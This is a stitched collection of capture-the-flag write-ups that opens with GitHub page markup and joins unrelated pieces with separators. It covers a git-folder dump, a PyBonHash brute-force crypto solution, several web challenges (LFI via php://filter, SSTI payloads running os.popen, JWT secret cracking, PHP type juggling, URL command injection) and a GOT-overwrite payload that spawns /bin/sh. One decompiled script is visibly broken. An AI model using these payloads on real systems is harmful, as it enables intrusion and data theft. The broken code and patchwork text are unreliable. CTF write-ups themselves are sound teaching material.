<div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" tabindex="" class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/ironore15/ctf/refs" cache-key="v0:1581181692.0" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="aXJvbm9yZTE1L2N0Zg==" prefetch-on-mouseover >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div></template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<footer class="SelectMenu-footer">View all branches</footer> </ref-selector>
</div>
<div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" tabindex="" hidden class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/ironore15/ctf/refs" cache-key="v0:1581181692.0" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="aXJvbm9yZTE1L2N0Zg==" >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <footer class="SelectMenu-footer">View all tags</footer> </ref-selector> </div> </tab-container> </input-demux> </div></div>
</details>
</div>
<div class="Overlay--hidden Overlay-backdrop--center" data-modal-dialog-overlay> <modal-dialog role="dialog" id="warn-tag-match-create-branch-dialog" aria-modal="true" aria-labelledby="warn-tag-match-create-branch-dialog-header" data-view-component="true" class="Overlay Overlay--width-large Overlay--height-auto Overlay--motion-scaleFade"> <header class="Overlay-header Overlay-header--large Overlay-header--divided"> <div class="Overlay-headerContentWrap"> <div class="Overlay-titleWrap"> <h1 id="warn-tag-match-create-branch-dialog-header" class="Overlay-title">Name already in use</h1> </div> <div class="Overlay-actionWrap"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" aria-label="Close" type="button" data-view-component="true" class="close-button Overlay-closeButton"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </div> </div> </header> <div class="Overlay-body "> <div data-view-component="true"> A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?</div>
</div> <footer class="Overlay-footer Overlay-footer--alignEnd"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn"> Cancel</button> <button data-submit-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn-danger btn"> Create</button> </footer></modal-dialog></div>
<div class="flex-1 mx-2 flex-self-center f4"> <div class="d-none d-sm-block"> <span><span><span>ctf</span></span></span><span>/</span><span><span>2020-MidnightSun</span></span><span>/</span>rsa_yay<span>/</span> </div> </div>
<div class="d-flex"> Go to file </div> </div>
<div class="f4 mt-3 mb-3 d-sm-none"><span><span><span>ctf</span></span></span><span>/</span><span><span>2020-MidnightSun</span></span><span>/</span>rsa_yay<span>/</span></div>
<div class="Box mb-3" > <div class="Box-header position-relative"> <h2 class="sr-only">Latest commit</h2> <div class="js-details-container Details d-flex rounded-top-2 flex-items-center flex-wrap" data-issue-and-pr-hovercards-enabled> <include-fragment src="/ironore15/ctf/tree-commit/ad0df2e3e7e1f0b5fcc3bcb6e24bb1b05510b83d/2020-MidnightSun/rsa_yay" class="d-flex flex-auto flex-items-center" aria-busy="true" aria-label="Loading latest commit"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-3"> </div></include-fragment> <div class="flex-shrink-0"> <h2 class="sr-only">Git stats</h2> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-history"> <path d="m.427 1.927 1.215 1.215a8.002 8.002 0 1 1-1.6 5.685.75.75 0 1 1 1.493-.154 6.5 6.5 0 1 0 1.18-4.458l1.358 1.358A.25.25 0 0 1 3.896 6H.25A.25.25 0 0 1 0 5.75V2.104a.25.25 0 0 1 .427-.177ZM7.75 4a.75.75 0 0 1 .75.75v2.992l2.028.812a.75.75 0 0 1-.557 1.392l-2.5-1A.751.751 0 0 1 7 8.25v-3.5A.75.75 0 0 1 7.75 4Z"></path></svg> <span> History </span> </div> </div> </div> <h2 id="files" class="sr-only">Files</h2>
<include-fragment src="/ironore15/ctf/file-list/master/2020-MidnightSun/rsa_yay"> Permalink
<div data-view-component="true" class="include-fragment-error flash flash-error flash-full py-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> Failed to load latest commit information.
</div> <div class="js-details-container Details" data-hpc> <div role="grid" aria-labelledby="files" class="Details-content--hidden-not-important js-navigation-container js-active-navigation-container d-block"> <div class="sr-only" role="row"> <div role="columnheader">Type</div> <div role="columnheader">Name</div> <div role="columnheader" class="d-none d-md-block">Latest commit message</div> <div role="columnheader">Commit time</div> </div> <div role="row" class="Box-row Box-row--focus-gray p-0 d-flex js-navigation-item" > <div role="rowheader" class="flex-auto min-width-0 col-md-2"> <span>. .</span> </div> <div role="gridcell" class="d-none d-md-block"></div> <div role="gridcell"></div> </div>
<div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>chall.txt</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>solve.py</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> </div> </div>
</include-fragment>
</div>
</div>
</div>
</div>
</turbo-frame>
</main> </div>
</div>
<footer class="footer width-full container-xl p-responsive" role="contentinfo"> <h2 class='sr-only'>Footer</h2>
<div class="position-relative d-flex flex-items-center pb-2 f6 color-fg-muted border-top color-border-muted flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap mt-6 pt-6"> <div class="list-style-none d-flex flex-wrap col-0 col-lg-2 flex-justify-start flex-lg-justify-between mb-2 mb-lg-0"> <div class="mt-2 mt-lg-0 d-flex flex-items-center"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <span> © 2023 GitHub, Inc. </span> </div> </div>
<nav aria-label='footer' class="col-12 col-lg-8"> <h3 class='sr-only' id='sr-footer-heading'>Footer navigation</h3> Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About </nav> </div>
<div class="d-flex flex-justify-center pb-6"> <span></span> </div></footer>
<div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> You can’t perform that action at this time. </div>
<div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template>
<div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div>
<template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none m-2"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> </clipboard-copy> </div></template>
</div>
<div id="js-global-screen-reader-notice" class="sr-only" aria-live="polite" ></div> </body></html>
|
# Beta release
> Price: **749 points**>> Description: **После долгих и упорных стараний мы вот-вот готовы выкатить наш сервис в продакшн и снять с него пометку `beta`. Но ничего ли мы не забыли?**>> Flag: **MSKCTF{l34v1g_g1t_f0ld3r_1s_t00_b4d_id34_l0l}**
This `beta` thing got me thinking about *git*, and after running *dirsearch* on this site, we can see this:
```Target: http://beta-release.tasks.2020.ctf.cs.msu.ru/[15:43:31] Starting:[15:43:36] 200 - 12B - /.git/COMMIT_EDITMSG[15:43:36] 200 - 137B - /.git/config[15:43:36] 200 - 23B - /.git/HEAD[15:43:36] 200 - 250B - /.git/info/exclude[15:43:36] 200 - 73B - /.git/description[15:43:36] 200 - 691B - /.git/index[15:43:36] 200 - 10KB - /.git/logs/refs/heads/master[15:43:36] 200 - 41B - /.git/refs/heads/master[15:43:36] 200 - 56KB - /.git/logs/HEAD[15:43:36] 200 - 54B - /.gitignore[15:43:36] 200 - 54B - /.gitignore/```
This is git repo! Let's try to `git clone` this.
```$ git clone http://beta-release.tasks.2020.ctf.cs.msu.ru/.git/Cloning into 'beta-release.tasks.2020.ctf.cs.msu.ru'...fatal: repository 'http://beta-release.tasks.2020.ctf.cs.msu.ru/.git/' not found```
What? Repository not found? But it's there! After doing some research, I find [this](https://github.com/internetwache/GitTools) useful toolkit for git. So, after downloading and extracting the thing, we have 3 files to work with. And after running `gitdumper.sh` and `extractor.sh` on that website, we have *.git* of that site, as well as all commits, that had been made. To find our flag, we have to look in every *main.py* of every commit. Let's automize that with python.
```python#!/usr/bin/env python3import osimport sys""" Do this, to get repo from the site. os.mkdir('./task')os.system("./gitdumper.sh http://beta-release.tasks.2020.ctf.cs.msu.ru/.git/ task/git")os.system("./extractor.sh task/git task/repo")"""path = f'{sys.path[0]}/task/repo'ls = os.listdir(path)for x in ls: f = open(f'{path}/{x}/main.py', 'r').read() if "MSKCTF" in f: a = f.find('MSKCTF') b = f.find('}') # Do this, to find flag offset. print(f[a:b+1]) break``` |
# Pybonhash writeupWe are given a [.pyc file](https://github.com/henriknero/writeups/tree/master/pybonhash/pybonhash/pybonhash.cpython-36.pyc), this file can simply be decompiled using uncompyle6 which gives us [this](https://github.com/henriknero/writeups/tree/master/pybonhash/pybonhash/pybonhash.py). We are also supplied with a hash.txt that is 6528(204*32) characters long.
## pybonhash file```pythonimport string, sys, hashlib, binasciifrom Crypto.Cipher import AESfrom flag import keyassert len(key) == 42data = open(sys.argv[1], 'rb').read()assert len(data) >= 191FIBOFFSET = 4919MAXFIBSIZE = len(key) + len(data) + FIBOFFSET
def fibseq(n): out = [ 0, 1] for i in range(2, n): out += [out[(i - 1)] + out[(i - 2) return out
FIB = fibseq(MAXFIBSIZE)i = 0output = ''while i < len(data): data1 = data[(FIB[i] % len(data))] key1 = key[((i + FIB[(FIBOFFSET + i)]) % len(key))] i += 1 data2 = data[(FIB[i] % len(data))] key2 = key[((i + FIB[(FIBOFFSET + i)]) % len(key))] i += 1 tohash = bytes([data1, data2]) toencrypt = hashlib.md5(tohash).hexdigest() thiskey = bytes([key1, key2]) * 16 cipher = AES.new(thiskey, AES.MODE_ECB) enc = cipher.encrypt(toencrypt) output += binascii.hexlify(enc).decode('ascii')
print(output)
```So data i read from a file supplied in arg 1. The data is then hashed using the key supplied in a file flag.py and outputted to stdout.
So the program iterates through the data and the key for len(data) times. Each iteration generating a 64byte string. Each iteration picks 2 characters from the data-string and 2 characters from the key at the index of a fibonacci number which is chosen by two different equations.
Each 2byte datastring is hashed using md5, and the 2 bytes taken from the key are multiplied to generate a 32byte key for a AES ECB crypto.
```md5(2 databytes) -> AES_ECB(2 keybytes*16) -> "output_hash"```
So initially we thought we would need to utilize knowledge of the flag format ```midnight{xxxxxxxxxxxxxxxxxxxx}```. But the script hints that each character is ascii encoded which means "only" 128 possible solutions per key and data byte. So there are 128^4 possible inputs for each 64byte output. And we know that because of it being md5hashed we can be relatively certain that each input output 64byte is unique. **TLDR We bruteforced it.**
```pythonoutput = open("pybonhash/hash.txt").read()fuck = [output[i:i+64] for i in range(0, len(output), 64)]
import binascii, hashlibfrom Crypto.Cipher import AESfrom itertools import productfrom string import ascii_letterskeyword_map= {}for x in range(0,128): for y in range(0,128): keyword_map[binascii.hexlify(hashlib.md5((chr(x) + chr(y)).encode('utf-8')).digest())] = (chr(x) + chr(y))for x in range(0,128): print(bytes([x, y])) for y in range(0,128): thiskey = bytes([x, y]) * 16 cipher = AES.new(thiskey, AES.MODE_ECB) for key in keyword_map: enc = cipher.encrypt(key) if binascii.hexlify(enc).decode('ascii') in fuck: print(binascii.hexlify(enc).decode('ascii') + " : " + chr(x) + chr(y))``` So at this moment I just put the output of this script into the [pybonhash script](https://github.com/henriknero/writeups/tree/master/pybonhash/pybonhash/pybonhash_mod.py) and map each output-hash to the key. Then print the key:
```midnight{xwJjPw4Vp0Zl19xIdaNuz6zTeMQ1wlNP}```
|
<h1 align="center">Web Exploitation</h1>
<h3>Hot Access 70 points</h3>
Access to all the latest modules, hot off the press! What can you access?
Connect here: http://jh2i.com:50016
```shell
http://jh2i.com:50016/?m=modules/../.htaccess
<Directory /var/www/html>
Options Indexes FollowSymLinks MultiViews AllowOverride All Order allow,deny allow from all </Directory>
<Directory /var/www/html/sshh_dont_tell_i_hid_the_flag_here> AllowOverride All </Directory>
http://jh2i.com:50016/sshh_dont_tell_i_hid_the_flag_here/flag.txtLLS{htaccess_can_control_what_you_access}
Flag: LLS{htaccess_can_control_what_you_access}```
<h3>PHPJuggler 80 points</h3>
PHP is here to entertain again! They’ve shown you magic tricks, disappearing acts, and now… juggling!
Connect here: http://jh2i.com:50030.
``` shellPhp Type Juggling strcmp:
submit POST requests with flag[]=flagWarning: strcmp() expects parameter 1 to be string, array given in /var/www/html/index.php on line 6You got it! That's the correct flag!LLS{php_dropped_the_ball_again}
Flag: LLS{php_dropped_the_ball_again}```
<h3>Magician 80 points</h3>
Show me a hat trick!
Connect here: http://jh2i.com:50000
``` shellMagic Hash as whihehat security or 247CTF!!!:
hash ==> 0e908377363673038390833004129775password ==> f789bbc328a3d1a3e4UPoL
Flag: LLS{magic_hashes_make_for_a_good_show}```
<h3>GLHF 90 points</h3>
LMFAO! FLAG PLZ, THX!
Connect here: http://jh2i.com:50014
``` shellLocal file inclusion: LFI:
http://jh2i.com:50014/index.php?page=php://filter/convert.base64-encode/resource=index
http://jh2i.com:50014/index.php?page=php://filter/convert.base64-encode/resource=FLAG
<html> <head> <title> PHPLFIXYZ </title> </head> <body>
<h1> FLAG???? </h1>
<h1> WTF, PLZ??? </h1>
</body></html>
Flag: LLS{lmfao_php_filters_ftw}```
<h3>MASK 90 points</h3>
Take off your mask.
Connect here: http://jh2i.com:50023.
``` shellServer Side Template Injection:
test ==> {{7*7}} response 49
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}```
``` shell{{config.__class__.__init__.__globals__['os'].popen('cat flag.txt').read()}}
Flag: LLS{server_side_template_injection_unmasked}```
<h3>JaWT 90 points</h3>
Check the admin's scratchpad!
Connect here: http://jh2i.com:50019/
``` shellChallenge as PicoCTF and use crackjwt.py
FOR JOHNpython crackjwt.py "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiam9obiJ9.rbnjOn5BykmgvHXJyaasrM08WFQji58yEnmzkfQ8Wmc" /media/sf_D_DRIVE/WORDLISTS/rockyou.dicCracking JWT eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiam9obiJ9.rbnjOn5BykmgvHXJyaasrM08WFQji58yEnmzkfQ8Wmc1648it [00:00, 6560.78it/s]('Found secret key:', 'fuckit')
FOR ADMINeyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.qfSqP1u-gAhG6r8Vfb31Fi5WkjYCxjRKhFEcLCde8O0
Change value of cookie jwt
Hello admin!
Here is your JaWT scratchpad!
LLS{jawt_was_just_what_you_thought}
Flag: LLS{jawt_was_just_what_you_thought}```
<h3>10 Character Web Shell 100 points</h3>
Only 10 char--
Connect here: http://jh2i.com:50001.
``` shell
http://jh2i.com:50001/?c=cat%20flag*```
``` shellFlag: LLS{you_really_can_see_in_the_dark}```
<h3>Dairy Products 100 points</h3>
There is a new advertising campaign on the classic dairy company’s website. You need to steal their latest product.
Connect here: http://142.93.3.19:50008
```shellJust use wget because gitdumper.sh don't download repo.
wget -r --no-parent http://142.93.3.19:50008/.git/
git statusgit --no-pager log -p | grep LLS{LLS{you_gitm_gotm_good_partner}
Flag: LLS{you_gitm_gotm_good_partner}```
<h3>GET Encoded 125 points</h3>
I don't GET this%21 Do you%3F
Connect here: http://jh2i.com:50013
```shellrobots.txt with /?debug```
```shellhttp://jh2i.com:50013/?%73ystem=ls
flag_that_you_could_never_guess.phpindex.phprobots.txt
Machines hunt for more than humans do.
http://jh2i.com:50013/?%73ystem=cat%20flag%5fthat%5fyou%5fcould%5fnever%5fguess.php
Machines hunt for more than humans do.
Machines hunt for more than humans do.
Flag: LLS{i_gotcha_url_encoding}```
Return to the main menu
Return to the main menu |
Got overwrite attack: `strtok('/bin/sh')` -> `system('/bin/sh')`
```pythonlibcbase = 0xf7e19000system = libcbase+0x0003ad80strtok_got = 0x5655904c
offset = 2048payload = 'A'*offsetpayload += p32(system)payload += p32(strtok_got)
sla('\tName: ','TaQini')sla('> [? for menu]: ','attend Hacker')# debug('b *0x56556591')sla('Welcome!\n',payload)
# strtok(cmd) -> system(cmd)sla('> [? for menu]: ','/bin/sh')```
[Details](http://note.taqini.space/#/ctf/AUCTF-2020/?id=remote-school) |
# PyBonHash
In this challenge we're given two files: * `hash.txt`: a file containing the hex encoded hash* `pybonhash.cpython-36.pyc`: a compiled version of the python script responsible of the hashing
unlike assembly, python byte code can be decompiled with precision, meaning that the decompiled script is (almost)identical to the original script, after a quick google search, i found a decompiler called [uncompyle6](https://github.com/rocky/python-uncompyle6/), it worked perfectly and yielded this script:```pythonimport string, sys, hashlib, binasciifrom Crypto.Cipher import AESfrom flag import key
if not len(key) == 42: raise AssertionErrorelse: data = open(sys.argv[1], 'rb').read() assert len(data) >= 191FIBOFFSET = 4919MAXFIBSIZE = len(key) + len(data) + FIBOFFSET
def fibseq(n): out = [ 0, 1] for i in range(2, n): out += [out[(i - 1)] + out[(i - 2)]]
return out
FIB = fibseq(MAXFIBSIZE)i = 0output = ''while i < len(data): data1 = data[(FIB[i] % len(data))] key1 = key[((i + FIB[(FIBOFFSET + i)]) % len(key))] i += 1 data2 = data[(FIB[i] % len(data))] key2 = key[((i + FIB[(FIBOFFSET + i)]) % len(key))] i += 1 tohash = bytes([data1, data2]) toencrypt = hashlib.md5(tohash).hexdigest() thiskey = bytes([key1, key2]) * 16 cipher = AES.new(thiskey, AES.MODE_ECB) enc = cipher.encrypt(toencrypt) output += binascii.hexlify(enc).decode('ascii')
print(output)```
looking at the script, we can easily understarnd how the hashing process is done:1. the `hashing key` has a fixed length of 422. data length >= 1913. it generates a Fibonacci sequence of `MAXFIBSIZE` terms where `MAXFIBSIZE == 4961 + len(data)`4. it loops `range(0, len(data), 2)` times, doing the following: 1. choose two bytes from the data with the following positions: ```python FIB[i] % len(data), (FIB[i + 1] % len(data)) ``` 2. choose two bytes from the key with the following positions: ```python (i + FIB[FIBOFFSET + i]) % 42, (i + 1 + FIB[FIBOFFSET + i + 1]) % 42 ``` 3. hash the concat of the two data bytes using md5 4. create an encryption key that is the concat of the two key bytes repeated 16 times 5. encrypts the hex encoded md5 hash using AES in ECB mode
